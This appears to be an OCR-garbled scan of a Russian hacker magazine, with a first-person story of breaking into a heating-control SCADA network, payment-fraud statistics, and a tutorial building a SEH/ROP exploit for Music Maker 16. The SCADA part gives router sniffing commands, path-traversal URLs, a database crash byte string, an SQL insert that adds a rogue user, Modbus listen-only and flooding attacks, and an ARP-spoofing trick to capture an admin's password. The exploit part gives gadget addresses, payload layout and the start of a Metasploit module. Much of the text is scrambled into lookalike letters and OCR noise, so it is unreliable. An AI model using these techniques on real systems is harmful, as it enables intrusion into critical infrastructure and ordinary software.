атаки на отказ в обслуживании, а порт для подключения базы был доступен злоумышленнику. 


Поделюсь с тобой практической историей о том, как я проводил аудит 
системы диспетчеризации управления расходом тепловой энергией 
для жилых домов. Основной моей задачей было обнаружить суще- 
ствующие в системе уязвимости и осуществить удаленный доступ к 
ключевым элементам системы. 

Обозначив для себя диапазон сети, было решено выявить в нем 
пограничный шлюз доступа. Искать долго не пришлось, это был С15со 
Кощег апа Зесигцу Оемсе Мападег на маршрутизаторе С1зсо 7301, 
более известный в народе как С15СО 50М. Мне требовалось полу- 
чить к нему доступ, по возможности изучить его конфигурационный 
файл, обозначить для себя диапазоны внутренних сетей и выявить 
там самое ценное. 

Как ни странно, на самом шлюзе было целых две уязвимости: 

® обход авторизации [е\е! 15; 

® интегрированная учетная запись «с1хсо» (шлюз был только введен 


в эксплуатацию, так что сами администраторы еще не успели там 
ничего наладить с безопасностью). 

Получив доступ, первым делом я вбил команду «5По\/ гиппипа 
сопйа», чтобы просмотреть конфигурационный файл. Как и ожида- 


Иногда вместо ожидаемых «5есге{ /»-хэшей на С15СО-роутерах 
встречаются «зесгеё 5» (С15СО\{уре «5» ра5$\/ога<]. Процесс полу- 
чения пароля по хешу отличен от взлома «зесге{ '/», который можно 
расшифровать с помощью известных скриптов, Сашт апд АБе|! и 
многих других программ. Пример того, как выглядят и хранятся 
хэши паролей: 


и5егпате )БазИ епаб1е 5есге{ 5 
$1$1133$с02езкККби7мНЕХ2В$ЬОБаР. 

и5егпате )Ба$И раззмога 7 907362Е590Е1В1С041В1Е!124С9А2Е2Е? 
06832752Е1АО11340 


Нетрудно заметить, что алгоритм хэширования аналогичен пп45, 


поэтому в данном случае можно прибегнуть кпомощи современ- 


ных программных средств, умеющих восстанавливать такие типы 
хэшей, аименно Ра$з\\мога$ Рго, /обп ТВе К'ррег, ЕСВ итак далее, 
чтобы провести атаку по словарю. Конструктивно это выглядиттак: 


$1$ЕККК$+2МООР . м5$СМЬмЭМЕВМУО/ ($уре "5"), 
где «ЕККК» — соль (5а1+{) 
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лось, внутри я обнаружил захэшированные пароли. 

Изучив подсети, я сразу взялся за анализ сети прямо с пограничного 
маршрутизатора. Естественно, эту задачу можно было решить двумя 
способами: 

® активно, с использованием скриптов ТСЁ, которые бы бегали по 
узлам сети и осуществляли подключения на известные порты для 
сбора информации о сервисах; 

® пассивно, здесь все немного сложнее, потому что только современ- 
ные прошивки оборудования С15СО содержат С5со 105 Етбедаея 
РасКе{ Сар{иге (ЕРС] — весьма полезную вещь, выступающую в каче- 
стве пакетного анализатора для диагностики сети. 

Чтобы не наделать много шума, я пошел по второму пути, для чего 
мне требовалось превратить шлюз в один большой сниффер, как раз 
с помощью ЕРС: 


# включение режима ЕХЕС 

епаб1е 

# задаем буфер захвата с именем "рКфгасе1", размером 256 байт, 
# с ограничением по максимальному размеру элемента буфера в 


Самодельный брутфорсер могбы выглядеть примернотак: 


ореп$$1 рама -1 -за1+ ЕККК с1$со 


На месте «с15со» — перебирающиеся слова из словаря с паро- 
ЛЯМи. 
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В недрах системы диспетчеризации ЭСАБА 


# 100 байт 

топ1фог сарфиге Би Рег рК*гасе1 $17е 256 тах-$17е 100 с1гси1аг 
# задаем точку захвата, в качестве интерфейса мониторинга 

# используем Раз Е{Пегпет, в отношении как входящего трафика, 
# так и исходящего 

топ1фог сарфиге ро1п* 1р се+ 1рсеРа0/1 КазЕ{Пегпе*-фуре 
0/1 Ботп 

# ассоциируем точку захвата с буфером 

топ1фог сарфиге ро1п* аззос1афе 1рсе{+а@0/1 рК{гасе1 

# организация старта захвата 

топ1фог сарфиге ро1п{ $Фаг{ 1рсе{Ра@/1 

# вывод захваченной информации 

5Ном топ1Фог сарфиге Би Рег рК&гасе1аитр 


Обнаружив в трафике строки с указанием порта ТСР 502, мне 
многое стало ясно, потому что данный порт характерен для про- 
токола МООВИ$ ТСР. По маршрутизации пакетов и адресу назна- 
чения можно было судить о том, где находится центр управления. 
Собственно, таким способом можно вести вполне полноценную 
пассивную сетевую разведку с маршрутизирующего оборудования, 


Русская компания НТЦ «Станкоинформзащита», занимающаяся 
безопасностью АСУ ТП, опубликовала аналитический отчетс 
анализом инцидентов информационной безопасности АСУ ТП 
зарубежных государств за 2008-2010 годы. Наиболее интересные 
ИЗ НИХ: 

7 марта 2008 года, Блок 2 ядерной станции «На(сй» [штат 
Джорджиа, США], внештатное аварийное выключение на 48 
часов после установки обновления программного обеспечения 
(похожий инцидент случился в 2006 году на ядерной станции 
«Вгомуп$ Геггу» из-за нештатного сбоя программируемого 
логического контроллера при получении аномального выходного 
сетевого трафика из производственной сети]; 

® Май 2008 года, Корпорация Теппеззее УаЦеу А{Погиу (Т\А] 

(в ведомости данной энергетической корпорации находятся 11 


угольных станций, 8 ТЭС, Зядерных станции, 29 ГЭС США), про- 


верка регуляторов (САО, НН5] выявила порядка 2000 уязвимостей 
разной степени критичности. Среди брешей в безопасности были 
выявлены сегменты производственной сети, подключенные кин- 
тернету, множественные уязвимости прикладного ПО, отсутствие 
обновлений безопасности, ошибки в проектировании архитекту- 
ры сети и каналов обмена данными; 

® 26 августа 2008 года, Центр полетного планирования Феде- 
рального управления гражданской авиации США, диспетчерские 
трех десятков американских аэропортов выведены из строя вре- 
зультате компьютерного сбоя в центре полетного планирования. 
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в частности — с любого маршрутизатора С15СО, имеющего акту- 
альную версию прошивки. Запустив сканер, я понял, что там уже 
кто-то продуктивно побывал до меня: несколько узлов было зара- 
жено червем, каждый из которых образно говорил мне: «Мы ждем 
своего хозяина». Следует отметить интересный факт, что настройки 
по умолчанию многих систем 5САВА рекомендуют организовать 
анонимный доступ к ОСОМ ОС Мггозой \\/п9до\м5, что порождает 
огромные бреши в безопасности. Также многие из промышленных 
протоколов по ряду причин (сложность реализации на оборудова- 
нии телеметрии, увеличение объема трафика] не поддерживают 
шифрование. Тем временем, хэши, взятые из конфигурации 50М, 
расшифровывались. На этот раз вместо родного С15СО «5есге{ 7» в 
качестве алгоритма хэширования применялся МО5. 


Система диспетчеризации 


Расшифровав пароли, я начал изучать периметр сети. Некоторые из 
хостов имели алиасы внешних |Р-адресов, что позволяло мне под- 
ключиться к ним извне. Получив доступ к одной из рабочих станций 
в пределах сети, я начал проводить активный поиск всех устройств 
АСУ ТП с помощью софтины «5САПА-Аудитор». Любой другой сканер 
показал бы мне доступные ТСР 502-порты, характерные для МООВО$, 
но установить нативное соединение и узнать оттуда служебную 
информацию — этого они, конечно, не умеют. С использованием 
«5САПА-Аудитора» требовалось выявить в диапазонах сетей те узлы, 
которые содержат признаки размещения систем диспетчеризации 
или элементов телеметрии. Сделать это можно по целому ряду при- 
знаков, если знаешь, что искать. Одним из возможных критериев для 
поиска является вывод опроса 5ММР-протокола в случае его доступ- 
ности. Так же в пределах самой сети, по административной панели и 
встроенному меб-серверу, я нашел саму 5САПА — это была Каскад- 


В сетях МООВИУ5$ может быть использован один из двух способов 
передачи данных: АЗС! или КТО. Пользователь выбирает необхо- 
димый режим вместе с другими параметрами (скорость передачи, 
режим паритета и так далее} во время конфигурации каждого 
контроллера. При использовании АЗС!||-режима каждый байт 
сообщения передается как два АЗС!|-символа. Главное преиму- 
щество данного способа — время между передачей символов 
может быть до секунды без возникновения ошибок при передаче. 
ВАЗС!-режиме сообщение начинается с «двоеточия» (:, АБСИЗА 
Бех) и заканчивается последовательностью «возврат каретки- 
перевод строки» (СКЕЕ, АСИ 0 и ОА вех). Допустимые символы 
для передачи — это шестнадцатиричные цифры 0-9, А-Е. Монитор 
сетевого устройства в сети непрерывно отслеживает символ 
«двоеточие». Когда он принят, каждое устройство декодирует 


следующее поле сообщения [поле адреса] итак далее. 
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Проект технологического процесса — похоже на схему тепловой сети 


АСУ. Изучив систему, я выявил целый ряд уязвимостей: 

1) Неавторизированное чтение директории с проектом технологиче- 
ского процесса: КАЗКАОЛМеь_С\+.аЦ/5Бом/Раде?\М\Меб_С п т:. Из 
него же можно узнать полный путь до базы: 


Рго]ес+="С : \Рговгат Е11ез\КазКаа\Рго]ес{$ \ 
К\/1$1опбетоРго]ес*\Ка$Каа.Крг" 


2} Раскрытие пользовательской информации: КАБКАОЛМе СшеаШ 
ЭВом/Раде?../../../Ргоес{5/КМюпОетоРго]есИСопНдига{ог/Еуеп($.1п 
3] Чтение пароля и юзера к базе данных 

ОзегМагте=зузара 

Раз$мог4=ЬРВЕФГЪФИ [пароль извлекается ХОР’ом на 0х1В] 

4) Раскрытие служебной информации: 

КАЗКАБЛМ№Ме6_С т. 9Ц/5ВомРаде?../../../Рго]ес{5/К\МюопОетоРго]ес И 
СопНдигаог/З(аНоп$.1п! 


С]пЕТРАЯЧг1=127.0.01 
Порт = 3050 


5) Отказ в обслуживании с помощью записи в порт ТСР 3050 сле- 
дующей строки (уязвимость характерна для СУБД Етеы!гч]: 


\х00\х00\х00\х35\х4а\х4а\х4а\х4а\х4а\х4а\х4а\х4а\х4а\х4а 
\х4а\х4а\х4а 


6} Неавторизированное добавление пользователя 5САПА: 


ТМУЕКТ ТМТО У$ЕКЕТЗТ (У$ЕВМАМЕ, УЗЕВРА$$И, МАМЕ, СКРМАМЕ, 
РОЕЕМАМЕ, РЕАб$, РЕАС$_, АЕЕОМТТМЕ, КЕСТЪТЕКТТМЕ, 
ГАЗТЕМТЕКТТМЕ, ГАЗТРАИОСНАМСЕТТМЕ, РМОКЕЕРРЕКТОО, ЗТАТТОМФ, 
ОВОРТТМЕОЦТ, Р5РКОВАССЕ$$, РРМВАССЕ$$ , Р5РВБАССЕ$5 _, 
РЪРИКАССЕ$ $ _) МАЕОЕ$ ('ТТО", '745Е87АбВЫ6ВАСАВ', '1%а', 
'Пользователи', Юрий Каминков', 3, пи11, пи11, '2002- 
01-30 13:11:36.0', '2002-01-30 13:11:36.0', '2002-01-30 
1:11 50,0 ПЕ В, ПР Пит, ПО, ое, 


Не МООВИ$’ом единым! 


Обнаружив узлы телеметрии, управляемые по МООВОФ, я взялся за 
работу. Поковырявшись в протоколе, можно выявить много интерес- 
ных особенностей. 

1) Например, существует возможность перевести устройства РИС 
в режим И$еп оп. Данный режим позволяет отключить РЕС от 
обработки и исполнения команд на некоторый интервал време- 
ни, что может привести к останову системы в целом. Согласно 
архитектуре МООВОИЗ только одно устройство (Ма$ег] может ини- 
циировать передачу [сделать запрос). Другие устройства [З[ауе] 
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% -= а — == 


т =. '— т с те с 9 с -. 35 с = == | пеаелааиние Быьет О На Биби 


‚в 
Гелия я Проди Вкырый (Е 
п Ты аатьвия Виши ша ' [В "Бсиекы Бака. = ви ли По а ТЕ 
==, = = : = = та 
2 Зи гит НЫ - ет иены Е Ч ИЕ 
п ттт-ыт = 3 пли - спаеа сисаши саван 
= ры Е 
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м4 8 ета Би и Бет и 
| ь к. и 1 О 
: вы Чен Е 
жар №9 № В 
вн ели, пы ый ты РВ = ВВ рвы Вьны ВЫ Бы ДБ БЫ Вы ПБ Бы ПИ 
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Контроллер МООВИ$ для энергетической отрасли. Одно из его 
назначений — выполнение телеметрирования 


передают запрашиваемые главным устройством данные или про- 
изводят запрашиваемые действия. Типичное главное устройство 
включает в себя ведущий (НОЗТ] процессор и панели программи- 
рования. Гипичное подчиненное устройство — программируемый 
контроллер. Перевод РЁС-устройств в режим И$еп оп реализу- 
ется с помощью рассылки специальных пакетов либо конкретному 
5[ауе-устройству, либо сразу всем подчиненным устройствам с 
помощью широковещательного запроса. 5(ауе-устройство возвра- 
щает сообщение в ответ на запрос, адресуемый именно ему. При 
широковещательных запросах ответы не возвращаются. 

2) Другой характерной ошибкой (правда, никак не связанной с 
реализацией протокола) является некорректная обработка вход- 
ных данных на стороне устройства, работающего с промышлен- 
ным протоколом. Разработчики зачастую забывают контролиро- 
вать предельные размеры пакетов, что приводит к крешу и нару- 
шает работу устройства. Например, драйвер Модби$ 5САПАРаск 
известного пакета С[еаг-САПА, способен обрабатывать пакеты 

от 60 до 260 байт. Что будет с девайсом, если заслать ему пакеты 
подлиннее, можешь проверить сам :]. 

3] Схожей проблемой являются ошибки проектирования штат- 
ных служб и сервисов, используемых на контроллерах. Начиная 

с интегрированных меБ-серверов и заканчивая Ир-демонами. 
Скажем, известный Аррмеб Етбедаеч \\еБ Зегуег валится с 
помощью флуда, генерируемого утилитой Арасйе Вепсптагкта 
Тоо( (аб), пример: 


аЬ -п 1000 -с 50 ПЕЁр: //ххх.ххх.ххх.ххх/1паех. НЕ т1 
-п — суммарное количество запросов 
-с — количество одновременных запросов 


4] Поделюсь с тобой одной хитрой уловкой. Если отключить один из 
контроллеров телеметрии МООВОЪ, у Администратора начнется пани- 
ка, и он точно полезет туда, чтобы перезагрузить контроллер, а потом 
зайдет в админку, чтобы посмотреть все настройки. Здесь-то можно 

и перехватить его пароль, отсниффав трафик в сегменте ЛВС с помо- 
щью АКР-спуфинга. 


У нас проблема 


Беда существующей нормативной базы очевидна: нет ясных и явных 
требований к столь критически важным системам как АСУ ТП и, в 
частности, ЭСАПА. Недавно наши специалисты обнаружили типовое 
ТЗ, нашедшее свою реализацию в одной из автоматизированных 
информационно-измерительных систем коммерческого учета электро- 
энергии [АИИС КУЗ]. Требования по защите от несанкционированного 
доступа, согласно РД ФСТЭК РФ, которые учитывались разработчика- 
ми, — 2Б. К сожалению, данный класс не учитывает множество вопро- 
сов, таких как сигнализация попыток нарушения защиты, контроль 
доступа субъектов к программам, узлам сети, каналам связи, и много 
чему еще. Проблема! == 
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БЕЗОПАСНОСТЬ ПЛАТЕЖЕЙ 


Мировой рынок электронных платежей составляет больше десяти триллионов долларов в год, и эти деньги 
притягивают к себе огромное количество киберпреступников. Что насчет статистики по типам и источникам 
угроз? Каждая крупная компания, занимающаяся безопасностью электронных платежей, публикует отчеты о 
своей деятельности. Среди разнообразных цифр и графиков попадаются весьма занимательные данные. 


ПРОИСХОЖДЕНИЕ АТАК 


Согласно отчету компании Тги$\М/ауе, 32% атак на платежные системы осуществляются из России. Впрочем, сюда можно смело плюсовать и 
24% атак, происхождение которых аналитикам установить не удалось: видимо, УРМ + зосК$ сВат сделали свое дело, и часть российских хаке- 
ров сумела скрыть свое происхождение. В отчете компании \Мепзоп эту проблему решили просто: 65% случаев атак они классифицировали как 
происходящие из «Восточной Европы». 


Россия 


Великобритания Германия 
Австрия 


Польша 
Словакия 


ь Украина 
Румыния 


© 


4% у 
Ванци Чи 


.5% 
Турция 


Канада 


Нидерланды 
Китай 


: 


6% 


Италия 


Индонезия 


США 


Вьетна 


С 


Малазия 


Эквадор 


Колумбия 


Происхождение неизвестно 


ВРЕМЯ РЕАКЦИИ 


Изучая такой важный параметр как время обнаружения индидента, аналитики Тгиз\М/ауе пришли к неутешительным результатам. Даже компании, 
которые серьезно занимаются собственной безопасностью, замечают утечку в среднем лишь через месяц после того, как она произошла. Остальные 
компании порой не укладываются и в полгода. 


Самостоятельное обнаружение 

28 Дней 

Обнаружение правоохранительными органами 
51.5 Дней 


Публичное обнаружение 
87.5 Дней 

Обнаружение регулятором 
156.5 Дней 


ДНИ 50 100 150 
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ТИПЫ УГРОЗ 


Любопытно, что больше половины случаев утечек данных, по мнению Тгизмауе, происходят из-за удаленного доступа к приложениям, когда 
злоумышленникам известны логины и пароли. Уетзоп смотрит на классификацию угроз несколько более детально: изучив более 800 случаев 
утечек данных из финансовых систем, специалисты пришли к выводу, что 90% утекших записей утекли из-за разнообразных форм удаленно- 
го взлома, и только 10% записей пострадали из-за инсайдерства и физической кражи информации. 


Использование различных хакерских 
техник по версии \ег150п 


Недостаки Использование бекдоров 73% /45% 
парол ЬНОЙ Использование паролей по умолчанию 67%/30% 
защиты Брутфорс и атаки по словарю 52% /34% 
Фут-принтинг и фингер-принтинг 19% /19% 
Использование украденных паролей 21%/21% 
5 -инъекции 14%/24% 
Социальная инженерия Недостаточная аутентификация 10%/21% 


10% /19% 
9% /15% 
1% /4% 

1% /1% 


Злоупотребление функциональностью 


Переполение буфера 


Почтовый троян 


901-инъекции 
Уязвимости в СМ5 


Недостаточная авторизация 


Межсайтовый скриптинг 


., Подделка межсайтовых запросов 1% /1% 
Инсайдерство Криптоанализ | 1% /1% 
Физический доступ 005 на уровне приложения | 1% /1% 


Удаленный доступ Брутфорс криптозащить 
Другое 


кфайлам | | р 
Неизвестно | 


1% /1% 
1% /1% 
4% /9% 


НАРУШЕНИЯ РС! 055 


Как известно, существует специальный стандарт для обеспечения безопасности данных в платежной индустрии. Однако то обстоятельство, что любая 
финансовая организация проходит обязательную сертификацию по РС! 055, никак не влияет на количество украденных денег. Аналитики утверждают, 
что дело не втом, что стандарт какой-то не такой, а втом, что многие компании его саботируют. 


0 
975% м 77.20 4% 95% 


% ПРОПУЩЕННЫХ ТРЕБОВАНИИ РС! 05$ 
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Ш М Длексей Синцов О!9Ца[ ЗесигКу (мег. сот/а$1поу) 


с 


вая 


СмлАсо 


Музс МаКег16 


Мис МакКег 16 


Я3 


С акег 16 


т 


® Здравствуйте, дорогие любители эксплойтостроения! Сегодня мы 
познакомимся с немецкой компанией МАХ Аб иее продуктом Миз!с 
Макег 16. В процессе нашего знакомства мы найдем уязвимость 


нулевого дня, а также напишем эксплойт, который будет обходить 
ОБЕРи АУЕК. 


Предыстория 

Началась эта история с того, что автор, как обычно, на работе с 
чашкой чая и пончиком в зубах читал новостную ленту [вот так 
работают в Ода! ЗесигКу]. Мое внимание привлек заголовок 
«МАСИХ АС угрожает судебным преследованием специалисту по 
безопасности». Суть была примерно в следующем: шведский 
парень Ас!адеп из тусовки Соге[ап Теат нашел уязвимость в 
продукте компании МАС АС под названием Миз!с Макег 16. 
После чего он написал письмо разработчикам, где сообщил 

всю инфу о баге и сказал, что после патча опубликует ее вместе 
с РоС. Вроде бы ситуация классическая, и такие истории про- 
исходят каждый день с самыми разными компаниями. Однако 
немцы не оценили добрые намерения шведского хакера и вместо 
того, чтобы сказать парню спасибо, обратились в суд. По всей 
видимости, работники МАС АС не очень-то в курсе того, как 
следует себя вести в таких ситуациях. Что ж, им же хуже: сейчас 
я покажу, как даже без РоС любой баг-хантер может разнести их 
программу на куски. 
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пишем эксплоит 


Ищем 0Одау 


Скачав триал Мисс Макег 16, можно начать искать баги. Как 
известно, обычно уязвимости ищут фаззингом или статическим 
анализом. Но прежде чем начать использовать артиллерию, 
следует просто взглянуть на то, как работает программа. Итак, 
данный продукт предназначен для монтирования и сведения 
аудиоматериалов. Каждый проект объединяет в себе несколько 
аудиофайлов, их привязку к дорожкам, времени и так далее. 
Собственно, файл проекта, имеющий расширение .ттит, и явля- 
ется первой нашей фаззинговой мишенью. 

Прежде всего, откроем файл демо-проекта _Оето.ттит в любом 
НЕХ-редакторе (например, 010-ЕачКог]. Простого взгляда доста- 
точно, чтобы увидеть, как файлы с контентом [звуковые файлы) 
поступают в проект. Строки с путями и именами файлов просто 
разделены нулевыми байтами. Поскольку нигде не указан размер 
этих строк, то можно предположить, что Мис МакКег определяет 
конец строки по нулевому байту. Логично предположить, что если 
ПО не считает размер строки при копировании, а тупо идет до 
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| согейапс оО 3г 
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Твиттер — многие белые шляпы общаются именно 
здесь 


нулевого байта, то возможна классическая уязвимость — пере- 
полнение буфера. Чтобы быстро проверить эту гипотезу, руками 
затрем нули после имени файла, заменив их, к примеру, на 

‘а’. Выполнив это простое редактирование, можно попытаться 
открыть файл проекта в программе и... она с треском упадет. Что 
ж, теперь еще раз повторим открытие проекта. Только на этот 
раз присоединимся дебагером [я использую |пппттипКу ОеБидег] к 
процессу Мизс Макег до открытия файла. В результате дебагер 
покажет причину падения и исключительную ситуацию — чтение 
по несуществующему адресу. Так как возник Ассез$ Мо[аНоп, это 
заставит программу перейти к обработчику исключительной ситу- 
ации, указатель на который находится в стеке, который... мы тоже 
переписали значением байта ‘а’ из .ппипт файла. Вот, в общем, 
мы и нашли Одау-уязвимость без применения тяжелой артилле- 
рии, буквально за пару-тройку минут. 

Как я понял, шведский хакер Ас'адеп нашел другую уязвимость, 
зато нашу уязвимость параллельно и независимо нашел лидер 
команды Соге[ап — Соге[апсо@Зг, автор известной примочки 
руейпдадаг. Но у него свой путь, ау нас — свой. Вообще, неуди- 
вительно, что одну и ту же уязвимость находят несколько человек, 
особенно такую простую и очевидную :]. 


Эксплойт 


Найдя уязвимость, я выложил скриншот бага, чтобы донести до 
создателей софта простую мысль: для нахождения уязвимости 
совершенно не нужен никакой РоС, достаточно абстрактного ука- 
зания «в софтине Мизюс Макег есть бага». Кстати, опубликован- 
ный скриншот с ошибкой никаким образом нельзя считать вредо- 
носным кодом, поэтому я абсолютно чист перед законами ФРГ и 
РФ. Однако очевидно, что информации со скриншота достаточно, 
чтобы любой другой человек нашел уязвимость. Так и получи- 
лось: наш читатель, известный мне под ником @ог(ГИ, без труда 
докопался до сути проблемы и даже написал эксплойт! Суть его 
проста: перезаписываем $ЕН-указатель на адрес инструкции рор 
РЕС/рор КЕС/ге(п, который предварительно нашли в программе, 
в какой-нибудь подгруженной ДЛЛ-ке без ба е5ЕН [что неслож- 
но, так как вендор не потрудился включить защиту за е ЕН). Это 
приведет к тому, что когда случится Ассез$ Мо[аНоп, управление 
перейдет по данному указателю... а там у нас рор/рор/ге{п. Это 
значит, что 8 байт из стека уйдут, и указатель ЕЗР опустится на 

8 байт выше («опустится выше» — добро пожаловать в матрицу). 
А восемью байтами ниже, по правилам игры, должен находить- 
ся указатель на наш переписанный 5ЕН-заголовок, только на 
четыре байта выше, где должен быть указатель на следующее 
звено 5ЕН-цепочки. Таким образом, КЕТМ возьмет указатель на 
наш переписанный указатель и вернет ЕМУ управление, то есть 
ЕР будет указывать на переписанный нами стек на то место, 

где должен быть указатель на следующий ЕН. Поэтому вместо 
указателя надо писать туда инструкцию УМР +0х12 [это для того, 
чтобы перепрыгнуть указатель на 5ЕН-дескриптор, который у нас, 
если ты помнишь, четырьмя байтам дальше]. Таким образом, имя 
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Продолжение атаки и РОП-программа 2, уже в куче 


«файла» во входном .птт-проекте должно иметь следующий 
вид: 


аааа...аааахХХхХхХх\У\У\У\У7 7777777711... 


аааа...аааа — буфер 

ХХХХ — указатель на следующий $ЕН, а на самом деле — 90х909010ЕВ 
(ЭМР +0х12/пор/пор) 

УУУУ — указатель на $ЕН-дескриптор, а на самом деле — адрес 
любой рор/рор/ге{п инструкции 

2222 — куча М№Р и шеллкод 


В этом случае ход выполнения программы такой: 

1. Грузим файл; 

2. Ассез$ М о[а{оп: 

3. Переход по У\\У; 

4. РОР/РОР/ВЕТМ => Исполняется ХХХХ: 

5. ХХХХ = УМР +0х12; 

6. Исполняется 111/11, т.е шеллкод. 

Все здорово, только эксплойт у меня не заработал. Причин 
несколько. Поскольку у меня \\/п4о\м/ 7 хб4, то я защищен ОЕР и 
АЗЕК. Из-за этого выбранное оп{г\ значение \У\УУ\У указывало на 
аЦ‘ку, которая прыгала в памяти из-за АЗК и ВазеНхУР. А даже 
если поменять УУ\У\ на то, что надо, УУУУ и 1212 не будут испол- 
нятся, так как ОЕР не даст исполнится коду из неисполняемого 
участка памяти — стека. Таким образом, эксплойт работает только 
в среде \\/п9ом/з ХР. Чуть позже оп{ГИ случайно сделал еще одну 
версию эксплойта, исправив один байт из \У\УУ\\ на нулевой. В 
таком варианте Ассез$ Мо[аЙоп не происходило, так как програм- 
ма воспринимала ввод как две строчки (из-за нулевого байта]. 
При этом переписывалось значение адреса возврата из функции 
на указатель кучи, причем ровно на место УУУУ\! Удивительное, 
магическое везение, как потом описывал данное событие оп(г|. 
В этом варианте после выхода из функции программа передава- 
ла управление в кучу на место УУУУ. Это позволяет не думать об 
АЗЁК, но не решает проблему с ОЕР. 


РОР-эксплойт 


Самое время вспомнить о возвратно-ориентированном про- 
граммировании. Год назад я уже писал о таких эксплойтах, время 
повторить изученное, но на более сложном примере. Дело в том, 
что наш буфер в стеке обрезанный. Хоть мы и переполняем буфер 
в стеке, мы ограничены длиной, которую программа считывает 
из файла. После перезаписи ЪЕН у нас остается в стеке ровно 
508 байт! Сюда поместится РОП-программа или шеллкод, но и то 
и то вместе не поместится. Соге[апсоЧЗг сделал РОП-программу 
+ едд-Ву{ег-шеллкод (он маленький и помещается после РОП- 
программы в оставшийся объем, но он работает до-о-олго, пока 
ищет в куче основной шеллкод по восьмибайтной метке]. Я же 
мазохист, и мне интересно мгновенное срабатывание шеллкода. 
Покопавшись по содержимому стека, я увидел следующее: в стеке 
до 5ЕН байт 100. В стеке по определенному смещению содер- 
жится указатель на кучу, на результат конкатенации пути + имени 
файла. Причем, если в стеке у нас начало имени файла попорче- 
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Начало атаки и РОП-программа 1 


1. Переполнаем буфер в стене 
2. Перезапиеыозем ЗЕН 
3. Восстоноелиевем ЕБР 
4. Читаем указатель ма кучу 


5. Подготаолиезем параметры 
для Уго Асс 


6. Меяном стеновый фромм 


Схема работы эксплойта 


но, то в куче нет, тем не менее, длина также ограничена. 
Моя идея состояла в следующем: переписываем ЕН [\\У\\)- 
указателем на КОР-инструкцию для выравнивания указателя на 
стек так, чтобы ЕЗР указывал не куда-то там, а точно на нашу 
КОР-программу из стека. То есть У\\У\ должен указывать на КОР- 
гаджет, который меняет указатель ЕЗР, а потом делает КЕТМ, чтобы 
передать управление следующему КОР-гаджету и КОР-программе 

в целом. Для поиска гаджетов я использовал уже упомянутую при- 
мочку Соге[апсоЧЗг'а. Все мои гаджеты из двух не поддерживающих 
АЗЕК библиотек — ГТККМТАМ.аЦ и ЕТО!$14п.аЦ. Таким образом, я 
нашел гаджет АБО "ЕЗР,4Е8 # РЕТМ 4” по адресу 0х20012026 (всегда 
постоянные, так как модуль не поддерживает АБ). В результате 
после Ассез$ УМо[айоп программа переходила по этому адресу и 
меняла указатель стека, после чего он указывал в зону аааа...аааа. 
Таким образом, КЕТМ 4 передавала управление по адресу из аааа... 
аааа, поэтому туда я также добавил адреса, но уже с меньшим сдви- 
гом — АБО ЕЗР, 40 Я КЕТМ\. В результате указатель стека рос, пока 
не попадал в зону 177/, где я и расположил РОП-программу. 


КОР-программа 

КОР-программа представляет собой указатели на РОП-гаджеты, 

а также некоторые параметры. Главное ограничение — запрет на 
использование нулевых байт и размер. Так как шеллкод в стек не 
поместить, моя РО -программа брала на сохраненный до аааа...аааа 
указатель на кучу, где хранится путь и имя файла, соединенные в 


одну строку: 
РРРР...РРРР/ЕЕЕЕЕ...РЕЕаааа...аааахХХХХУ\У\\\ 777722... 


> ОбА 


ЧЕ: Е В 1 


пеарой-строка и руейпдадаг помогают сразу же опре- 
делить, какие байты перезаписывают ЕН 


Путь и имя файла из 
„МММ файла, 
обрезанные по длинне 


- Делаем кучу ысполняемойя 

В. Выполнюем шеллнод 1, 
который дельет неполняемой 

В дретто етрамицу [с шеллнодом 2] 


3. Выполыяем шеллкод 2 


Часть имени файла перезаписывает 
данные из стека 


роВЕ-ВВВВ — путь 

РЕЕЕ. ЕЕРЕ — начало имени файла, через которое мы атакуем 
аааа...аааа — КОР: 90х20012026 

УУУУ - ЗЕН-КОР: 0х20012026 

РАДАР - КОР-программа 


Примерно так. Замечу еще раз, что в стеке у нас поместилась 
только часть этого буфера: аааа...ааааХХХХ\У\\ 7777/71... именно ее 
мы используем для КОР-программы. Вышеупомянутый указатель 
указывает на ЕЕЕЕ, так что КОР-программа будет использовать най- 
денную кучу для того, чтобы записать в ЕЕЕЕ параметры для вызова 
\ча(АЦос. Чтобы выполнить шеллкод, нам надо сделать память 
исполняемой. Для этого годится, например, вызов \/иаРгщесе, 
который может менять флаги доступа на страницы памяти и может 
сделать ее исполняемой. Но в указанных библиотеках я не нашел 
вызовы этой функции, зато нашел вызовы У[иа{[АЦос, которая выде- 
ляет память, однако ее можно использовать для «перевыделения» 
памяти, задав при этом флаг доступа на исполнение, что позволит 
нам выполнить шеллкод из кучи. 

Сама функция Утиа[АЦос находится в Кегпе[32.аЦ, ее адрес не 
известен из-за АЗЁК, но так как [ТО514п.аЦ используют этот вызов, 
они сохраняют этот адрес в своей .Чаа-секции, которая постоян- 
на, так как эти ДЛЛ-ки не поддерживают АЗЁЕК. В итоге по адресу 
ОхТЕНАЕТ60 хранится указатель на Уиа[АЦос. Его я записал в ЕЕЕЕ- 
зону, так как там будет хранится небольшая РОП-программа номер 
два. РОП-программа «один» (77777) вычисляет нахождение РОП- 
«два» (РЕЕЕ), считает параметры, сохраняет так же в ЕЕЕЕ, после 
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Для эффективной проверки вставим на это место 
пеазрюй-строку 


чего меняет ЕЗР на ЕЕЕЕЕ, после чего исполняется КОР-«два», кото- 
рая делает ЕЕЕЕ исполняемой и передает управление куче, в самом 
конце ЕЕЕЕ. В конце ЕЕЕЕ-шеллкод также не поместится, поэтому его 
я решил схоронить в РРРР...РРРР. Таким образом, там можно поме- 
стить шеллкод размером до 750 байт, что достаточно для большин- 
ства задач. ЕЕЕН...ЕЕЕЁ можно условно разбить так: 


00...001111222233334444\ММ..\М\333333... 
00...00 
1111222233334444 - место для параметров \А, сюда пишет РОП 1 
Ми... 

У). 


- РОП-программа 2 


- вызов \/А, передача управления на кучу дальше 
- $Фабе 9 шеллкод, прыжок на РРРР...РРРР 


Последняя часть нужна, так как выяснилось, что иногда РРРР лежит 
в другой странице памяти, поэтому \Л/\/\/. МЛМ делает исполняемой 
только ЕЕЕЕ-часть, а РРРР — нет. Поэтому %аде 0 шеллкод вычис- 
ляет по сдвигу РРРР, еще раз вызывает \А, делает уже страницу с 
РРРР исполняемой, после чего передает управление на шеллкод. Ну 
вот, с теорией и покончено. Как видно, написать эксплойт намного 
сложнее, чем найти дыру :]. Теперь давай перейдем к самому экс- 
плойту, который я написал в виде модуля для М&азрнк. 


Реализация эксплойта 

ааа_Чафа = ааа_Пеааег # Заголовок МММ-файла 
ааа_Чафа << "\х00"*1680 

ааа_Чафа << ааа_11$+ 

ааа_Чафа << "\х00"*25 


